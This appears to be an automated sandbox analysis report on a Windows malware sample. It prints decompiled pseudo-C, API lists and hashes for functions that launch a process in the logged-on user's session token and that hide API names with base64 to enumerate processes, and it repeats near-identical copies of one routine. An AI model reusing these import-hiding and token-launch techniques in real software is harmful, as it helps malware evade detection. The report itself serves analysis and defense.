                            • GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407ED9
                            • LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407EEA
                            • GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407EF0
                              • Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,?,?,004195AF,?), ref: 00402778
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc$FileModuleName
                            • String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
                            • API String ID: 2206896924-1825016774
                            • Opcode ID: 0cb1a10cb0afd6386a7f655548666b5db567e4255bdcd2ba9efbb176b3dd9032
                            • Instruction ID: 9bf8d232eeb036b67e33b264b33e971c9bdc3eb444cf3167ee6f8a24d5f4ba5e
                            • Opcode Fuzzy Hash: 0cb1a10cb0afd6386a7f655548666b5db567e4255bdcd2ba9efbb176b3dd9032
                            • Instruction Fuzzy Hash: B0312BB1A44209AEDB00EBE5CC42F9EBBF8AF49704F50057AF514F71D1DA78AA058B58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 48%
                            			E00407E90(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                            				char _v8;
                            				char _v12;
                            				char _v16;
                            				char _v20;
                            				char _v36;
                            				intOrPtr _v96;
                            				char _v104;
                            				char _v108;
                            				_Unknown_base(*)()* _t25;
                            				_Unknown_base(*)()* _t27;
                            				intOrPtr* _t58;
                            				intOrPtr _t71;
                            				intOrPtr* _t73;
                            				void* _t76;
                            				void* _t78;
                            
                            				_v108 = 0;
                            				_v8 = 0;
                            				_v16 = 0;
                            				 *[fs:eax] = _t78 + 0xffffff98;
                            				/* The session, token and environment APIs are resolved at runtime instead of being imported. */
                            				_t25 = GetProcAddress(LoadLibraryA("kernel32.dll"), "WTSGetActiveConsoleSessionId");
                            				_t27 = GetProcAddress(LoadLibraryA("wtsapi32.dll"), "WTSQueryUserToken");
                            				_t73 = GetProcAddress(LoadLibraryA("userenv.dll"), "CreateEnvironmentBlock");
                            				E00402754(0,  &_v108); /* subcall 00402754 calls GetModuleFileNameA (see APIs below): the sample's own image path */
                            				E00403D88( &_v16, _v108);
                            				E00404F5C();
                            				_v104 = 0x44; /* STARTUPINFOA.cb = sizeof(STARTUPINFOA) = 0x44 */
                            				_v96 = 0;
                            				 *_t25( *[fs:eax], 0x407fa6, _t78, __edi, __esi, __ebx, _t76); /* WTSGetActiveConsoleSessionId(); the listed arguments are decompiler stack noise */
                            				_push( &_v12);
                            				_push(0);
                            				if( *_t27() != 0) { /* WTSQueryUserToken(session, &_v12): primary token of that session's logged-on user */
                            					 *_t73( &_v20, _v12, 0xffffffff); /* CreateEnvironmentBlock(&_v20, token, bInherit = -1, Delphi True) */
                            					_t58 =  *0x41b32c; // 0x41c724  -- import thunk, not named in this report
                            					/* 11 arguments in CreateProcessAsUser order: token, application path (_v16), command line (_v8),
                            					   no security attributes, no handle inheritance, 0x400 = CREATE_UNICODE_ENVIRONMENT, environment block, no cwd, &si, &pi */
                            					 *((intOrPtr*)( *_t58))(_v12, E00403D98(_v16), E00403D98(_v8), 0, 0, 0, 0x400, _v20, 0,  &_v104,  &_v36);
                            					asm("sbb eax, eax");
                            				}
                            				_pop(_t71);
                            				 *[fs:eax] = _t71;
                            				_push(E00407FAD);
                            				E004034E4( &_v108);
                            				E00403BDC( &_v16);
                            				return E00403BDC( &_v8);
                            			}

                            (instruction address column, 0x00407e9b to 0x00407fa5, omitted)

                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407EBC
                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407EC2
                            • LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407ED3
                            • GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407ED9
                            • LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407EEA
                            • GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407EF0
                              • Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,?,?,004195AF,?), ref: 00402778
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc$FileModuleName
                            • String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
                            • API String ID: 2206896924-1825016774
                            • Opcode ID: 984abb6abeb68ca2210e3db115ae7419a545ddaace0a8bc11d40afc7d51257d8
                            • Instruction ID: 15232c232ae21084946ce838b98eef105223b8b68f92314a8400df0ccc42bf71
                            • Opcode Fuzzy Hash: 984abb6abeb68ca2210e3db115ae7419a545ddaace0a8bc11d40afc7d51257d8
                            • Instruction Fuzzy Hash: CF313AB1A04309AEDB00EBE5CC42F9EBBECAF49704F500576F514F71D1EA78AA048B58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 71%
                            			E00416290(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                            				char _v8;
                            				long _v12;
                            				intOrPtr _v16;
                            				char _v17;
                            				char _v24;
                            				char _v28;
                            				char _v584;
                            				char _v588;
                            				char _v592;
                            				char _v596;
                            				char _v600;
                            				char _v604;
                            				char _v608;
                            				char _v612;
                            				CHAR* _t113;
                            				CHAR* _t119;
                            				CHAR* _t125;
                            				void* _t137;
                            				void* _t141;
                            				void* _t169;
                            				signed int _t170;
                            				void* _t171;
                            				intOrPtr* _t174;
                            				signed int _t183;
                            				intOrPtr* _t192;
                            				void* _t193;
                            				signed int _t194;
                            				signed int _t195;
                            				intOrPtr _t214;
                            				intOrPtr _t216;
                            				signed int _t229;
                            				intOrPtr* _t239;
                            				signed int _t240;
                            				signed int _t242;
                            				void* _t243;
                            				void* _t244;
                            				void* _t246;
                            				intOrPtr _t247;
                            
                            				_t238 = __esi;
                            				_t245 = _t246;
                            				_t247 = _t246 + 0xfffffda0;
                            				_v612 = 0;
                            				_v608 = 0;
                            				_v604 = 0;
                            				_v596 = 0;
                            				_v600 = 0;
                            				_v592 = 0;
                            				_v588 = 0;
                            				_v8 = 0;
                            				_v24 = 0;
                            				_v16 = __eax;
                            				 *[fs:eax] = _t247;
                            				/* API and DLL names are stored base64-encoded ("Q3Jl...aG90" = "CreateToolhelp32Snapshot",
                            				   "UHJv...c3RX" = "Process32FirstW", "UHJv...dFc=" = "Process32NextW", "a2Vy...ZGxs" = "kernel32.dll")
                            				   and decoded (E004069A8) right before GetProcAddress, so the names never appear in the import table or as plain strings. */
                            				E004069A8("Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90", __ebx,  &_v588, __edi, __esi);
                            				_t113 = E00403990(_v588);
                            				_t192 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t113); /* CreateToolhelp32Snapshot */
                            				E004069A8("UHJvY2VzczMyRmlyc3RX", _t192,  &_v592, __edi, __esi);
                            				_t119 = E00403990(_v592);
                            				_t235 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t119); /* Process32FirstW */
                            				E004069A8("UHJvY2VzczMyTmV4dFc=", _t192,  &_v596, _t235, __esi);
                            				_t125 = E00403990(_v596);
                            				E004069A8("a2VybmVsMzIuZGxs", _t192,  &_v600, _t235, _t238);
                            				_t239 = GetProcAddress(LoadLibraryA(E00403990(_v600)), _t125); /* Process32NextW; here even the DLL name is decoded */
                            				E004034E4(_v16);
                            				_t193 =  *_t192(2, 0,  *[fs:eax], 0x4165c6, _t246, __edi, __esi, __ebx, _t244); /* CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS = 2, 0); trailing arguments are stack noise */
                            				if(_t193 != 0xffffffff) { /* INVALID_HANDLE_VALUE */
                            					_v584 = 0x22c; /* PROCESSENTRY32W.dwSize = 556 */
                            					_push( &_v584);
                            					_push(_t193);
                            					if( *_t235() != 0) { /* Process32FirstW(snapshot, &pe) */
                            						do {
                            							_push(E00404648(_v8) + 1);
                            							E00404804(); /* grow the dynamic array in _v8 by one entry */
                            							_t183 = E00404648(_v8);
                            							_t243 =  &_v584;
                            							memcpy(_v8 + _t183 * 0x8b * 4 - 0x22c, _t243, 0x8b << 2); /* copy the 0x8b*4 = 556-byte PROCESSENTRY32W into the new last slot */
                            							_t247 = _t247 + 0x10;
                            							_t235 = _t243 + 0x116;
                            							_t239 = _t239;
                            							 *((intOrPtr*)(_v8 + E00404648(_v8) * 0x8b * 4 - 0x20c)) = 0; /* clear dwFlags (+0x20) of the new entry; it is reused as a marker below */
                            							_push( &_v584);
                            							_push(_t193);
                            						} while ( *_t239() != 0); /* Process32NextW(snapshot, &pe) */
                            					}
                            					_t174 =  *0x41b1b4; // 0x41c690  -- import thunk, not named in this report
                            					 *((intOrPtr*)( *_t174))(_t193); /* called once with the snapshot handle */
                            				}
                            				}
                            				_t137 = E00404648(_v8) - 1;
                            				if(_t137 >= 0) {
                            					_v28 = _t137 + 1;
                            					_t195 = 0;
                            					do {
                            						_v17 = 1;
                            						_t169 = E00404648(_v8) - 1;
                            						if(_t169 >= 0) {
                            							_t171 = _t169 + 1;
                            							_t229 = 0;
                            							do {
                            								_t43 = _t195 * 0x8b * 4; // 0x0
                            								_t242 = _t229 * 0x8b;
                            								_t235 = _v8;
                            								_t47 = _t242 * 4; // 0x1ffff
                            								/* entry[i].th32ParentProcessID (+0x18) == entry[j].th32ProcessID (+0x08): the parent is still in the snapshot */
                            								if( *((intOrPtr*)(_v8 + _t43 + 0x18)) ==  *((intOrPtr*)(_v8 + _t47 + 8))) {
                            									_v17 = 0;
                            								}
                            								_t229 = _t229 + 1;
                            								_t171 = _t171 - 1;
                            							} while (_t171 != 0);
                            						}
                            						_t170 = _t195 * 0x8b;
                            						_t52 = _t170 * 4; // 0x0
                            						_t56 = _t170 * 4; // 0x1ffff
                            						/* an entry that is its own parent (e.g. PID 0) is treated as a root regardless */
                            						if( *((intOrPtr*)(_v8 + _t52 + 0x18)) ==  *((intOrPtr*)(_v8 + _t56 + 8))) {
                            							_v17 = 1;
                            						}
                            						if(_v17 == 1) {
                            							 *((intOrPtr*)(_v8 + 0x20 + _t170 * 4)) = 1; /* dwFlags = 1: root, i.e. parent exited or self-parented */
                            						}
                            						}
                            						_t195 = _t195 + 1;
                            						_t64 =  &_v28;
                            						 *_t64 = _v28 - 1;
                            					} while ( *_t64 != 0);
                            				}
                            				_v12 = GetCurrentProcessId();
                            				_t141 = E00404648(_v8) - 1;
                            				if(_t141 >= 0) {
                            					_v28 = _t141 + 1;
                            					_t194 = 0;
                            					do {
                            						_t240 = _t194 * 0x8b;
                            						if( *((intOrPtr*)(_v8 + 0x20 + _t240 * 4)) == 1) { /* only entries marked as roots are emitted */
                            							_t75 = _t240 * 4; // 0x1ffff
                            							if( *((intOrPtr*)(_v8 + _t75 + 8)) != _v12) { /* th32ProcessID != the sample's own PID */
                            								_push(_v24);
                            								_t90 = _t240 * 4; // 0x0
                            								E00403760( &_v608, 0x104, _v8 + _t90 + 0x24); /* szExeFile (+0x24), at most 0x104 = MAX_PATH characters */
                            								_push(_v608);
                            								_push(E00416680);
                            								E00403850();
                            							} else {
                            								_push(_v24);
                            								_t82 = _t240 * 4; // 0x0
                            								E00403760( &_v604, 0x104, _v8 + _t82 + 0x24);
                            								_push(_v604);
                            								_push(0x416674);
                            								_push(E00416680);
                            								E00403850();
                            							}
                            							_t96 = _t194 * 0x8b * 4; // 0x1ffff
                            							E004160EC( *((intOrPtr*)(_v8 + _t96 + 8)), _t194,  &_v612, 1, _t235, _t240, _t245);
                            							E00403798( &_v24, _v612);
                            						}
                            						E00403538(_v16, _v24);
                            						_t194 = _t194 + 1;
                            						_t103 =  &_v28;
                            						 *_t103 = _v28 - 1;
                            					} while ( *_t103 != 0);
                            				}
                            				_pop(_t214);
                            				 *[fs:eax] = _t214;
                            				_push(E004165CD);
                            				E00403508( &_v612, 7);
                            				E004034E4( &_v24);
                            				_t216 =  *0x4160c4; // 0x4160c8
                            				return E00404810( &_v8, _t216);
                            			}

                            (instruction address column, 0x00416290 to 0x004165c5, omitted)

                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,), ref: 00416300
                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416306
                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,), ref: 0041632E
                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416334
                            • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE), ref: 00416373
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416379
                            • GetCurrentProcessId.KERNEL32(?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,,?,Zone: ,?,00416CA4), ref: 004164A6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc$CurrentProcess
                            • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
                            • API String ID: 3877065590-4127804628
                            • Opcode ID: ca1fc72b4b2c47d8be44112ebefe3e9afb56faaddeba9d0254e414580a441eee
                            • Instruction ID: 2c13e8732db89e5f4feef8cb650b0c3b12524099063521553718e4477c38e71b
                            • Opcode Fuzzy Hash: ca1fc72b4b2c47d8be44112ebefe3e9afb56faaddeba9d0254e414580a441eee
                            • Instruction Fuzzy Hash: 779185709001199BCB10EFA9C985ADEB7B9FF84304F2181BAE509B7291D739DF858F58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 71%
                            			E00416288(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                            				char _v8;
                            				long _v12;
                            				signed int _v16;
                            				char _v17;
                            				char _v24;
                            				char _v28;
                            				char _v584;
                            				char _v588;
                            				char _v592;
                            				char _v596;
                            				char _v600;
                            				char _v604;
                            				char _v608;
                            				char _v612;
                            				signed int _t109;
                            				signed int _t110;
                            				CHAR* _t115;
                            				CHAR* _t121;
                            				CHAR* _t127;
                            				void* _t139;
                            				void* _t143;
                            				void* _t171;
                            				signed int _t172;
                            				void* _t173;
                            				intOrPtr* _t176;
                            				signed int _t185;
                            				intOrPtr* _t194;
                            				void* _t195;
                            				signed int _t196;
                            				signed int _t197;
                            				intOrPtr _t216;
                            				intOrPtr _t218;
                            				signed int _t231;
                            				intOrPtr* _t241;
                            				signed int _t242;
                            				signed int _t244;
                            				void* _t245;
                            				void* _t246;
                            				void* _t248;
                            				intOrPtr _t249;
                            
                            				_t240 = __esi;
                            				_t109 = __eax +  *__eax;
                            				 *_t109 =  *_t109 + _t109;
                            				_t110 = _t109 | 0x5500000a;
                            				_t247 = _t248;
                            				_t249 = _t248 + 0xfffffda0;
                            				_v612 = 0;
                            				_v608 = 0;
                            				_v604 = 0;
                            				_v596 = 0;
                            				_v600 = 0;
                            				_v592 = 0;
                            				_v588 = 0;
                            				_v8 = 0;
                            				_v24 = 0;
                            				_v16 = _t110;
                            				 *[fs:eax] = _t249;
                            				E004069A8("Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90", __ebx,  &_v588, __edi, __esi);
                            				_t115 = E00403990(_v588);
                            				_t194 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t115);
                            				E004069A8("UHJvY2VzczMyRmlyc3RX", _t194,  &_v592, __edi, __esi);
                            				_t121 = E00403990(_v592);
                            				_t237 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t121);
                            				E004069A8("UHJvY2VzczMyTmV4dFc=", _t194,  &_v596, _t237, __esi);
                            				_t127 = E00403990(_v596);
                            				E004069A8("a2VybmVsMzIuZGxs", _t194,  &_v600, _t237, _t240);
                            				_t241 = GetProcAddress(LoadLibraryA(E00403990(_v600)), _t127);
                            				E004034E4(_v16);
                            				_t195 =  *_t194(2, 0,  *[fs:eax], 0x4165c6, _t248, __edi, __esi, __ebx, _t246);
                            				if(_t195 != 0xffffffff) {
                            					_v584 = 0x22c;
                            					_push( &_v584);
                            					_push(_t195);
                            					if( *_t237() != 0) {
                            						do {
                            							_push(E00404648(_v8) + 1);
                            							E00404804();
                            							_t185 = E00404648(_v8);
                            							_t245 =  &_v584;
                            							memcpy(_v8 + _t185 * 0x8b * 4 - 0x22c, _t245, 0x8b << 2);
                            							_t249 = _t249 + 0x10;
                            							_t237 = _t245 + 0x116;
                            							_t241 = _t241;
                            							 *((intOrPtr*)(_v8 + E00404648(_v8) * 0x8b * 4 - 0x20c)) = 0;
                            							_push( &_v584);
                            							_push(_t195);
                            						} while ( *_t241() != 0);
                            					}
                            					_t176 =  *0x41b1b4; // 0x41c690
                            					 *((intOrPtr*)( *_t176))(_t195);
                            				}
                            				_t139 = E00404648(_v8) - 1;
                            				if(_t139 >= 0) {
                            					_v28 = _t139 + 1;
                            					_t197 = 0;
                            					do {
                            						_v17 = 1;
                            						_t171 = E00404648(_v8) - 1;
                            						if(_t171 >= 0) {
                            							_t173 = _t171 + 1;
                            							_t231 = 0;
                            							do {
                            								_t43 = _t197 * 0x8b * 4; // 0x0
                            								_t244 = _t231 * 0x8b;
                            								_t237 = _v8;
                            								_t47 = _t244 * 4; // 0x1ffff
                            								if( *((intOrPtr*)(_v8 + _t43 + 0x18)) ==  *((intOrPtr*)(_v8 + _t47 + 8))) {
                            									_v17 = 0;
                            								}
                            								_t231 = _t231 + 1;
                            								_t173 = _t173 - 1;
                            							} while (_t173 != 0);
                            						}
                            						_t172 = _t197 * 0x8b;
                            						_t52 = _t172 * 4; // 0x0
                            						_t56 = _t172 * 4; // 0x1ffff
                            						if( *((intOrPtr*)(_v8 + _t52 + 0x18)) ==  *((intOrPtr*)(_v8 + _t56 + 8))) {
                            							_v17 = 1;
                            						}
                            						if(_v17 == 1) {
                            							 *((intOrPtr*)(_v8 + 0x20 + _t172 * 4)) = 1;
                            						}
                            						_t197 = _t197 + 1;
                            						_t64 =  &_v28;
                            						 *_t64 = _v28 - 1;
                            					} while ( *_t64 != 0);
                            				}
                            				_v12 = GetCurrentProcessId();
                            				_t143 = E00404648(_v8) - 1;
                            				if(_t143 >= 0) {
                            					_v28 = _t143 + 1;
                            					_t196 = 0;
                            					do {
                            						_t242 = _t196 * 0x8b;
                            						if( *((intOrPtr*)(_v8 + 0x20 + _t242 * 4)) == 1) {
                            							_t75 = _t242 * 4; // 0x1ffff
                            							if( *((intOrPtr*)(_v8 + _t75 + 8)) != _v12) {
                            								_push(_v24);
                            								_t90 = _t242 * 4; // 0x0
                            								E00403760( &_v608, 0x104, _v8 + _t90 + 0x24);
                            								_push(_v608);
                            								_push(E00416680);
                            								E00403850();
                            							} else {
                            								_push(_v24);
                            								_t82 = _t242 * 4; // 0x0
                            								E00403760( &_v604, 0x104, _v8 + _t82 + 0x24);
                            								_push(_v604);
                            								_push(0x416674);
                            								_push(E00416680);
                            								E00403850();
                            							}
                            							_t96 = _t196 * 0x8b * 4; // 0x1ffff
                            							E004160EC( *((intOrPtr*)(_v8 + _t96 + 8)), _t196,  &_v612, 1, _t237, _t242, _t247);
                            							E00403798( &_v24, _v612);
                            						}
                            						E00403538(_v16, _v24);
                            						_t196 = _t196 + 1;
                            						_t103 =  &_v28;
                            						 *_t103 = _v28 - 1;
                            					} while ( *_t103 != 0);
                            				}
                            				_pop(_t216);
                            				 *[fs:eax] = _t216;
                            				_push(E004165CD);
                            				E00403508( &_v612, 7);
                            				E004034E4( &_v24);
                            				_t218 =  *0x4160c4; // 0x4160c8
                            				return E00404810( &_v8, _t218);
                            			}

                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,), ref: 00416300
                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416306
                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,), ref: 0041632E
                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416334
                            • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE), ref: 00416373
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416379
                            • GetCurrentProcessId.KERNEL32(?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,,?,Zone: ,?,00416CA4), ref: 004164A6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc$CurrentProcess
                            • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
                            • API String ID: 3877065590-4127804628
                            • Opcode ID: 758031882bcf12ba6c5acbce1a611c45e3d0127ec21c0e511c39f9a34a672d94
                            • Instruction ID: 8191d344cd349c88f577da4185e159338671ce922f6aa283bd2b5e25c2800bc5
                            • Opcode Fuzzy Hash: 758031882bcf12ba6c5acbce1a611c45e3d0127ec21c0e511c39f9a34a672d94
                            • Instruction Fuzzy Hash: E091A5709001199BCB10EFA9C985ADEB7B9FF84304F1181BAE508B7291D739DF858F98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 71%
                            			E0041628C(signed int __eax, void* __ebx, void* __edi, void* __esi) {
                            				char _v8;
                            				long _v12;
                            				signed int _v16;
                            				char _v17;
                            				char _v24;
                            				char _v28;
                            				char _v584;
                            				char _v588;
                            				char _v592;
                            				char _v596;
                            				char _v600;
                            				char _v604;
                            				char _v608;
                            				char _v612;
                            				signed int _t109;
                            				CHAR* _t114;
                            				CHAR* _t120;
                            				CHAR* _t126;
                            				void* _t138;
                            				void* _t142;
                            				void* _t170;
                            				signed int _t171;
                            				void* _t172;
                            				intOrPtr* _t175;
                            				signed int _t184;
                            				intOrPtr* _t193;
                            				void* _t194;
                            				signed int _t195;
                            				signed int _t196;
                            				intOrPtr _t215;
                            				intOrPtr _t217;
                            				signed int _t230;
                            				intOrPtr* _t240;
                            				signed int _t241;
                            				signed int _t243;
                            				void* _t244;
                            				void* _t245;
                            				void* _t247;
                            				intOrPtr _t248;
                            
                            				_t239 = __esi;
                            				_t109 = __eax | 0x5500000a;
                            				_t246 = _t247;
                            				_t248 = _t247 + 0xfffffda0;
                            				_v612 = 0;
                            				_v608 = 0;
                            				_v604 = 0;
                            				_v596 = 0;
                            				_v600 = 0;
                            				_v592 = 0;
                            				_v588 = 0;
                            				_v8 = 0;
                            				_v24 = 0;
                            				_v16 = _t109;
                            				 *[fs:eax] = _t248;
                            				E004069A8("Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90", __ebx,  &_v588, __edi, __esi);
                            				_t114 = E00403990(_v588);
                            				_t193 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t114);
                            				E004069A8("UHJvY2VzczMyRmlyc3RX", _t193,  &_v592, __edi, __esi);
                            				_t120 = E00403990(_v592);
                            				_t236 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t120);
                            				E004069A8("UHJvY2VzczMyTmV4dFc=", _t193,  &_v596, _t236, __esi);
                            				_t126 = E00403990(_v596);
                            				E004069A8("a2VybmVsMzIuZGxs", _t193,  &_v600, _t236, _t239);
                            				_t240 = GetProcAddress(LoadLibraryA(E00403990(_v600)), _t126);
                            				E004034E4(_v16);
                            				_t194 =  *_t193(2, 0,  *[fs:eax], 0x4165c6, _t247, __edi, __esi, __ebx, _t245);
                            				if(_t194 != 0xffffffff) {
                            					_v584 = 0x22c;
                            					_push( &_v584);
                            					_push(_t194);
                            					if( *_t236() != 0) {
                            						do {
                            							_push(E00404648(_v8) + 1);
                            							E00404804();
                            							_t184 = E00404648(_v8);
                            							_t244 =  &_v584;
                            							memcpy(_v8 + _t184 * 0x8b * 4 - 0x22c, _t244, 0x8b << 2);
                            							_t248 = _t248 + 0x10;
                            							_t236 = _t244 + 0x116;
                            							_t240 = _t240;
                            							 *((intOrPtr*)(_v8 + E00404648(_v8) * 0x8b * 4 - 0x20c)) = 0;
                            							_push( &_v584);
                            							_push(_t194);
                            						} while ( *_t240() != 0);
                            					}
                            					_t175 =  *0x41b1b4; // 0x41c690
                            					 *((intOrPtr*)( *_t175))(_t194);
                            				}
                            				_t138 = E00404648(_v8) - 1;
                            				if(_t138 >= 0) {
                            					_v28 = _t138 + 1;
                            					_t196 = 0;
                            					do {
                            						_v17 = 1;
                            						_t170 = E00404648(_v8) - 1;
                            						if(_t170 >= 0) {
                            							_t172 = _t170 + 1;
                            							_t230 = 0;
                            							do {
                            								_t43 = _t196 * 0x8b * 4; // 0x0
                            								_t243 = _t230 * 0x8b;
                            								_t236 = _v8;
                            								_t47 = _t243 * 4; // 0x1ffff
                            								if( *((intOrPtr*)(_v8 + _t43 + 0x18)) ==  *((intOrPtr*)(_v8 + _t47 + 8))) {
                            									_v17 = 0;
                            								}
                            								_t230 = _t230 + 1;
                            								_t172 = _t172 - 1;
                            							} while (_t172 != 0);
                            						}
                            						_t171 = _t196 * 0x8b;
                            						_t52 = _t171 * 4; // 0x0
                            						_t56 = _t171 * 4; // 0x1ffff
                            						if( *((intOrPtr*)(_v8 + _t52 + 0x18)) ==  *((intOrPtr*)(_v8 + _t56 + 8))) {
                            							_v17 = 1;
                            						}
                            						if(_v17 == 1) {
                            							 *((intOrPtr*)(_v8 + 0x20 + _t171 * 4)) = 1;
                            						}
                            						_t196 = _t196 + 1;
                            						_t64 =  &_v28;
                            						 *_t64 = _v28 - 1;
                            					} while ( *_t64 != 0);
                            				}
                            				_v12 = GetCurrentProcessId();
                            				_t142 = E00404648(_v8) - 1;
                            				if(_t142 >= 0) {
                            					_v28 = _t142 + 1;
                            					_t195 = 0;
                            					do {
                            						_t241 = _t195 * 0x8b;
                            						if( *((intOrPtr*)(_v8 + 0x20 + _t241 * 4)) == 1) {
                            							_t75 = _t241 * 4; // 0x1ffff
                            							if( *((intOrPtr*)(_v8 + _t75 + 8)) != _v12) {
                            								_push(_v24);
                            								_t90 = _t241 * 4; // 0x0
                            								E00403760( &_v608, 0x104, _v8 + _t90 + 0x24);
                            								_push(_v608);
                            								_push(E00416680);
                            								E00403850();
                            							} else {
                            								_push(_v24);
                            								_t82 = _t241 * 4; // 0x0
                            								E00403760( &_v604, 0x104, _v8 + _t82 + 0x24);
                            								_push(_v604);
                            								_push(0x416674);
                            								_push(E00416680);
                            								E00403850();
                            							}
                            							_t96 = _t195 * 0x8b * 4; // 0x1ffff
                            							E004160EC( *((intOrPtr*)(_v8 + _t96 + 8)), _t195,  &_v612, 1, _t236, _t241, _t246);
                            							E00403798( &_v24, _v612);
                            						}
                            						E00403538(_v16, _v24);
                            						_t195 = _t195 + 1;
                            						_t103 =  &_v28;
                            						 *_t103 = _v28 - 1;
                            					} while ( *_t103 != 0);
                            				}
                            				_pop(_t215);
                            				 *[fs:eax] = _t215;
                            				_push(E004165CD);
                            				E00403508( &_v612, 7);
                            				E004034E4( &_v24);
                            				_t217 =  *0x4160c4; // 0x4160c8
                            				return E00404810( &_v8, _t217);
                            			}

                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,), ref: 00416300
                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416306
                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,), ref: 0041632E
                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416334
                            • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE), ref: 00416373
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416379
                            • GetCurrentProcessId.KERNEL32(?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,,?,Zone: ,?,00416CA4), ref: 004164A6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc$CurrentProcess
